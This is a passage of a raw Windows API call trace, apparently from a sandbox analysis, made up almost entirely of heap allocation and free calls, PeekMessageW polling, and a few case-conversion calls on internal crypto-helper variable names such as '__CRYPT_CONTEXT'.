lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0231.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0231.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0231.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0231.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0231.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0231.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0231.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0231.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0231.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0231.921] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0231.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0231.921] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0231.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0231.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.921] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0231.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0231.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0231.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0231.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0231.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0231.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0231.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0231.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0231.922] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0231.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0231.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0231.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0231.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0231.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0231.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0231.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0231.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0231.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0231.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0231.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0231.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0231.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0231.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0231.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0231.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0231.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0231.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0231.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0231.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0231.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0231.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0231.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0231.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0231.924] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0231.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0231.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0231.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0231.924] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0231.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0231.924] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0231.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0231.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0231.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0231.925] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0231.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0231.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0231.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0231.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0231.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0231.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0231.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0231.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0231.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0231.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0231.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0231.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0231.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0231.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0231.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0231.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0231.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0231.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0231.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0231.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0231.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0231.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0231.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0231.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0231.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0231.926] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0231.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0231.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0231.926] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0231.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0231.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0231.927] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0231.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0231.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0231.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0231.927] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0231.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0231.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0231.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0231.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0231.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0231.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0231.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0231.927] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0231.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0231.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0231.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0231.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0231.928] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0231.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0231.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0231.928] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0231.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0231.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0231.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0231.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0231.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0231.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0231.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0231.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0231.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0231.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0231.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0231.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0231.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0231.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0231.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0231.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0231.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0231.929] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0231.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0231.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0231.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0231.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0231.930] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0231.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0231.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0231.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0231.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0231.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0231.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0231.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0231.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0231.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0231.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0231.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0231.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0231.931] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0231.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0231.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0231.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0231.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0231.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0231.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0231.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0231.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0231.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0231.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0231.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0231.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0231.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0231.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0231.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0231.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0231.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0231.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0231.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: 